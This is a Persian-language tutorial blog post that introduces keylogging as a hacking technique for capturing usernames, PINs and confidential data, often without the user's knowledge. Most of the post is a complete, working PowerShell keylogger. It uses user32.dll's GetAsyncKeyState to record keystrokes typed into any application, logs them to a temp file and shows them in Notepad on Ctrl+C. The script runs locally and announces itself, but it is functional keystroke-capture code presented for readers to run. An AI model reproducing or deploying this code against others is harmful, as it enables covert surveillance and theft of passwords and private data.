Keylogging فرآیندی است که توسط آن می توانید کلیدهایی که توسط کاربران در سیستم هایشان روی کیبورد فشار می هند را لاگ برداری کنید. این کار اغلب بدون آگاهی کاربر انجام می شود. Keylogging نیز به عنوان یک ترفند هکینگ مورد استفاده قرار می گیرد. با استفاده از keylogging ، تمامی کلیدهای استفاده شده توسط کاربر در صفحه کلید می توانند ثبت و ضبط شوند. این اطلاعات ثبت شده می تواند شامل نام کاربری، پین های مخفی ، داده های محرمانه و غیره می باشد. همچنین از Keylogging می توان برای شناسایی تخلفات نیز استفاده کرد. در این مقاله از یک برنامه قدرتمند ویندوز با نام Powershell برای ایجاد یک keylogger ساده استفاده می کنیم. Powershell در برای کاربردها و اپلیکیشن های بسیاری بصورت گسترده مورد استفاده قرار می گیرد و ما هم در این پست یک استفاده ساده از این ابزار قدرتمند ویندوزی خواهیم کرد.


برای این منظور، Powershell را در سیستم تان اجرا کرده و دستورات زیر را در آن وارد کنید تا اجرا شوند:

function Start-KeyLogger($Path="$env:temp\keylogger.txt")

{

  # Signatures for API Calls

  $signatures = @'

[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]

public static extern short GetAsyncKeyState(int virtualKeyCode);

[DllImport("user32.dll", CharSet=CharSet.Auto)]

public static extern int GetKeyboardState(byte[] keystate);

[DllImport("user32.dll", CharSet=CharSet.Auto)]

public static extern int MapVirtualKey(uint uCode, int uMapType);

[DllImport("user32.dll", CharSet=CharSet.Auto)]

public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@



  # load signatures and make members available

  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru



  # create output file

  $null = New-Item -Path $Path -ItemType File -Force



  try

  {

    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red



    # create endless loop. When user presses CTRL+C, finally-block

    # executes and shows the collected key presses

    while ($true) {

      Start-Sleep -Milliseconds 40



      # scan all ASCII codes above 8

      for ($ascii = 9; $ascii -le 254; $ascii++) {

        # get current key state

        $state = $API::GetAsyncKeyState($ascii)



        # is key pressed?

        if ($state -eq -32767) {

          $null = [console]::CapsLock



          # translate scan code to real code

          $virtualKey = $API::MapVirtualKey($ascii, 3)



          # get keyboard state for virtual keys

          $kbstate = New-Object Byte[] 256

          $checkkbstate = $API::GetKeyboardState($kbstate)



          # prepare a StringBuilder to receive input key

          $mychar = New-Object -TypeName System.Text.StringBuilder



          # translate virtual key

          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)



          if ($success)

          {

            # add key to logger file

            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)

          }

        }

      }

    }

  }

  finally

  {

    # open logger file in Notepad

    notepad $Path

  }

}



# records all key presses until script is aborted by pressing CTRL+C

# will then open the file with collected key codes

Start-KeyLogger

با اجرای دستور فوق در پاورشل، تصویر زیر را مشاهده خواهید کرد:



حالا برنامه ای را در سیستم تان باز کرده و کلیدهایی از صفحه کلید را در آن فشرده و تایپ کنید.



حال به انتهای دستورات در پاورشل دقت کنید. اگر دکمه Ctrl + c را بفشارید، نتایج این کلیدهای فشرده شده در برنامه، در Notepad به شما نمایش داده خواهد شد.



با چند خط دستور خیلی ساده و بصورت لوکال در یک سیستم Keylogger ایجاد کردید که صد البته Keylogger هایی که توسط هکرها برای مقاصد شوم استفاده می شود، به مراتب قوی و حرفه ای طراحی می شوند.